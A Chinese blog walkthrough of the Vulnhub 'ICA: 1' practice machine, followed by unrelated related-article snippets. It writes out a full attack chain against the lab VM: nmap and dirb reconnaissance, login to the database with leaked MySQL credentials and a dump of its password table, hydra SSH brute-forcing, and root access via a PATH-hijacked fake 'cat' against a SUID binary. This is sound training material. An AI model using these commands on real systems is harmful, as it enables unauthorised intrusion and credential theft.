ICA: 1 靶场详细教学

最新推荐文章于 2024-01-05 13:23:09 发布
最新推荐文章于 2024-01-05 13:23:09 发布
阅读量935 收藏 2
点赞数 1
分类专栏: Vulnhub百个项目渗透 网络安全 文章标签: 安全 web安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60374959/article/details/128101389
版权

目录

简介

信息收集

0x01 主机发现

0x02 端口扫描

0x03 目录爆破

漏洞利用

0x04 查找poc

0x05 进入数据库

提权

0x06 内网信息收集 

0x07 提权 

总结

简介

        该靶场前期考验的是我们的信息收集能力,通过信息收集找到一个框架的漏洞,再通过该漏洞进入数据库,找到远程连接ssh的账号密码,通过hydra爆破确认账号密码,内网部分是通过信息收集,主要是通过靶场给的提示去进一步找到文件,然后通过自己创建一个具有权限的文档,达到提权的目的。(有能力的小伙伴可以跟我小编的概述先自己去做一遍,不懂得再去看提升可能会更大哦!)

kali主机:192.168.1.58

靶机:192.168.1.18

信息收集

0x01 主机发现

发现靶机可以使用多种方式,这边举例三种
arp-scan -l      
netdiscover -r 192.168.1.1/24              #当前网段
nmap -sP 192.168.1.1/24                    #当前网段

 

0x02 端口扫描

nmap -sV -T5 -p- -A 192.168.1.18

登入80端口,发现是一个登入界面

 在登入界面中发现下面存在qdPM 9.2的信息

0x03 目录爆破

其实这一步可以不要,这边是使用两种方法去做一个信息收集,上面我们得到那个框架信息我们就可以直接去找漏洞,也就是可以直接跳到漏洞利用部分。

dirb http://192.168.1.18

 把爆破的目录可以都去看看,这边我们主要是看core文件下的config文件里面的databases.yml

 发现mysql的账号密码

账号:qdpmadmin
密码:UcVQCMQk2STVeS6J

 

漏洞利用

0x04 查找poc

上面我们发现qdPM 9.2的信息,我们可以在msf去寻找他的漏洞

searchsploit qdPM 9.2                                        #查询该漏洞
locate php/webapps/50176.txt                                 #查询漏洞poc位置
cp /usr/share/exploitdb/exploits/php/webapps/50176.txt .     #复制该漏洞到当前位置
cat 50176.txt                                                #查看poc

0x05 进入数据库

发现一条默认地址,我们可以访问(上面我们爆破出来了,咱们就直接利用了)

mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h 192.168.1.18
show databases;
use staff
show tables;
select * from user;
select * from login;

 发现密码是加密的,这里我们直接通过base64解密

账号:
meyer
dexter
travis
lucas
smith

密码:(解密后)
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
cqNnBWCByS2DuJSy
DJceVy98W28Y7wLg

 把他们分别放入users.txt和passwd.txt后,使用hydra爆破。

hydra -L users.txt -P passwd.txt 192.168.1.18 ssh

爆破出两组账号密码
[22][ssh] host: 192.168.1.18   login: dexter   password: 7ZwV4qtg42cmUXGX
[22][ssh] host: 192.168.1.18   login: travis   password: DJceVy98W28Y7wLg

 使用ssh连接

提权

0x06 内网信息收集 

第一个连接travis,连接后发现有个flag,并没有其他可以利用的信息,sudo也不能提权,我们直接跳过到第二个。

ICA{Secret_Project}

登入到dexter

发现一个note.txt

It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.

 这个时候我们要去寻找一些执行文件,我们通过find去找

 find / -perm -4000 2>/dev/null

 通过验证,发现第一个是存在利用点的

strings get_access

0x07 提权 

这个时候我们发现cat我们调用不了,我们需要自己创建一个。

创建cat时发现其他目录环境不能写入进去,我们得进入/home里去执行。

cd /home 
echo "/bin/bash" > /tmp/cat            #写一个假的cat
export PATH=/tmp:$PATH                 #将当前目录写入到环境
chmod +x /tmp/cat                      #给cat权限
echo $PATH                             #查看有没有写入成功
/opt/get_access                        #执行

 提权成功,去到root目录下找到第二个fiag

 

总结

涉及知识点:

1.信息收集

2.漏洞的查找和利用

收获:这个靶场相对而言是比较简单的,主要是信息收集占大部分时间,利用漏洞点也比较好理解,希望小伙伴可以好好消化里面的知识点。

心"元"意“码”
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【Vulnhub靶场】ICA: 1 通关writeup
weixin_44588899的博客
05-22 990
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.132 信息搜集 nmap -T4 -p- -A 192.168.220.132 发现开放22、80、3306端口,先打开80端口,发现cms是qdPM9.2版本,在exp-db搜索漏.
webDD-ICA:webDD ICA的网站50%
03-30
星期三
ica信号分选
11-19
对ica算法的优化 创新点明确 可以完成雷达 雷达信号分选 并与其它方法对比
ICA.rar_ICA
09-24
independent component analysis
ICA人脸识别
05-04
应用独立主元分析的方法实现了对人脸的识别原理和程序分析
靶机实战(2):ICA 1
OneMoreThink
12-10 84
靶机名称:ICA: 1[1]参考文章:大余每日一攻防ICA: 1(八)实战思路:1.主机发现2.端口发现(服务、组件)3.漏洞发现(获取权限)a.22端口/ssh服务i.组件漏洞ii.弱口令漏洞b.80端口/http服务i.组件漏洞ii.URL发现(目录、文件)iii.信息泄露c.3306端口/mysql服务i.组件漏洞ii.口令泄露4.提升权限a.sudob.perm一、主机发现启动虚拟机,直接...
Vulnhub靶场 ICA: 1
小小猪的博客
09-02 575
nmap进行IP服务扫描,发现开放80,22,3306端口。springs进行字符串查看,发现存在cat命令提权。访问并下载下来,发现里面存在mysql的账号密码。进行ssh爆破,密码需要提前解密,用户名全部是小写。访问80端口,可以看到是qdPM 9.2的框架。登录第二个用户,发现存在提示,说存在可执行文件。可以看到提示,存在一个敏感信息泄露文件。进行ssh登录,查看到第一个flag。kali进行漏洞搜索,发现存在。查看表,查看user表内的数据。进行查找,发现第一个存在可疑。权限提升,查找的flag。
【Vulnhub靶场】ICA: 1
DG_s1mple
03-16 3032
环境准备 把下载好的靶机导入到vmware 按照道理来说,这里会给出ip地址,但是我这没有,就得自己探测了 信息收集 使用arp-scan命令来探测靶机的IP地址 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.17 使用nmap扫描靶机开放的服务和端口 开放了22,80,3306和一个33060端口 渗透开始 我们首先访问它的网站 是一个比较完善的系统,并且下面给出了框架的版本为9.2 我们在kali搜索一下,看有没有已经公开的漏洞 发现有一个漏洞,我们查看一下
vulhub ica:1靶场
GRXHunter的博客
04-11 3807
vulhub ica1靶场实测
ica1靶机(hydra爆破)
m0_66299232的博客
12-04 399
靶机链接:百度网盘 请输入提取码提取码:4kn2虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2022.031.探测目标靶机ip2.用nmap探测靶机开放端口和服务nmap -p- -A -sV -T4 192.168.1.1073.用gobuster扫描网站目录gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php,txt,html,js,php.bak,txt.bak,
ICA:1渗透思路
weixin_54105551的博客
08-11 157
本文是关于ICA:1的渗透思路,刚学习网络安全的小白,所以写的有些水,大佬勿喷
matlab灰度处理代码-Overcomplete-ICA:超额ICA
05-23
matlab灰色处理代码超额ICA 该代码基于R,以重现Podosinnikova等人的论文“通过SDP进行过度独立组件分析”。 (2019)。 原始论文和其他一些参考文献都包含在papers/ 。 img/中包含一些复制的图形。 警示语 某些R...
ICA:一种基于OPTICS的增量聚类算法
05-12
无论是否进行聚类,聚类算法都在数据挖掘中起着重要作用。... 特别地,我们提出详细的比较ICA和OPTICS的结果,结果表明ICA更适合于聚类动态数据集,即随着时间的推移将一些新的数据对象添加到数据集中继续。
ICA:使用sklearn的Fast ICA实现对玻璃数据集进行独立成分分析
05-14
ICA 使用sklearn的Fast ICA实现对玻璃数据集进行独立成分分析。 ICA将产生独立的组件,例如PCA,但是这些组件不需要是正交的。
GI-ICA:GI-ICA和PEGI的Matlab实现-开源
04-28
这是在存在加性高斯噪声的情况下,用于ICA的GI-ICA算法的matlab实现。 James Voss,Luis Rademacher和Mikhail Belkin发表的论文“用于高斯噪声不变独立分量分析的快速算法”中讨论了该算法。
Vulnhub靶机:ica1
最新发布
qq_48904485的博客
01-05 364
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:ica1(10.0.2.5)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/ica-1,748/
ICA1 渗透靶场记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
09-29 616
ICA1 靶场渗透攻略向
vulnhub靶机--ica1
bobo_milk的博客
05-24 587
【vuln靶机】ica1
vulnhub之ICA1靶机
lionwerson的博客
11-24 3026
https://download.vulnhub.com/ica/ica1.ziphttp://ICA-1靶机下载1.下载靶机,virtualbox网络改为桥接模式,然后开机: 2.nmap扫描一下端口: nmap 192.168.0.11 -p- 有80端口和22端口,先从web端入手: 是一个登录界面,用电子邮箱和用户名登录,不打算先用暴力破解,先sqlmap跑一下: python sqlmap.py -r 1.txt 不过好像不存在sql注入,只能另辟蹊径,这个是一..
FastICA算法的详细求解过程
05-13
FastICA(Fast Independent Component Analysis)算法是一种基于最大独立性的盲源分离算法,用于从混合信号中提取出独立的信号成分。它是一种高效、快速、可靠的算法,并已成功应用于信号处理、图像处理、语音识别等领域。以下是FastICA算法的详细求解过程: 假设我们有 $m$ 个观测信号 $x_1,x_2,\cdots,x_m$,这些信号是从 $n$ 个独立源信号 $s_1,s_2,\cdots,s_n$($n \leq m$)通过某种线性混合方式得到的,即: $$ x = As $$ 其中,$x$ 是 $m$ 维观测信号向量,$s$ 是 $n$ 维源信号向量,$A$ 是 $m \times n$ 的混合矩阵。FastICA算法的目标是求解出 $A$ 和 $s$。 FastICA算法的基本步骤如下: 1. 中心化观测信号:将观测信号 $x$ 中每个维度的数值减去该维度所有数值的平均数,即: $$ x_{c,i} = x_i - \frac{1}{N}\sum_{j=1}^{N} x_{j,i} $$ 其中,$x_{c,i}$ 是中心化后的观测信号,$N$ 是观测信号的个数,$x_{j,i}$ 是第 $j$ 个观测信号的第 $i$ 个维度的数值。 2. 随机初始化权重向量 $w$:选择一个 $n$ 维列向量 $w$,并归一化,即: $$ w = \frac{w}{\|w\|} $$ 其中,$\|w\|$ 表示向量 $w$ 的模长。 3. 计算 $w$ 的变化量 $\Delta w$:根据最大独立性原理,$w$ 的变化方向应该是 $x$ 经过 $w$ 投影后最不“高斯”的方向,即: $$ \Delta w = E\{xg(wx)\} - E\{g'(wx)\}w $$ 其中,$g(x)$ 是一个非线性函数,用于将高斯化的信号变为非高斯化的信号,常用的非线性函数包括 $tanh$ 函数和 $exp$ 函数等;$g'(x)$ 是 $g(x)$ 的导数;$E\{\cdot\}$ 表示期望值。由于 $w$ 是单位向量,为了满足这个条件,我们可以通过Gram-Schmidt正交化方法来得到 $\Delta w$: $$ \Delta w = E\{xg(wx)\} - \sum_{i=1}^{k-1}(E\{xg(w_i^Tx)\})w_i $$ 其中,$w_i$ 是已经求得的 $i$ 个权重向量,$k \leq n$。 4. 更新权重向量 $w$:根据 $\Delta w$ 的方向来更新 $w$,即: $$ w_{new} = \frac{\Delta w}{\|\Delta w\|} $$ 5. 判断是否收敛:如果 $w_{new}$ 和 $w$ 的夹角小于一个给定的阈值,或者迭代次数达到了预定的最大值,那么就认为算法已经收敛,停止迭代;否则,重复步骤3到步骤5,直到收敛。 6. 重复步骤2到步骤5,直到求得所有的独立分量。 通过以上的步骤,我们可以得到混合矩阵 $A$ 和源信号向量 $s$。其中,混合矩阵 $A$ 可以通过如下公式得到: $$ A = W^{-1} $$ 其中,$W$ 是 $n \times n$ 的矩阵,每一列是一个权重向量 $w$。源信号向量 $s$ 可以通过如下公式得到: $$ s = A^{-1}x $$ 需要注意的是,FastICA算法并不能保证求得的独立分量是唯一的。因此,在实际应用中,需要进行后续处理,例如使用聚类算法进行分类或者通过人工选择合适的分量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值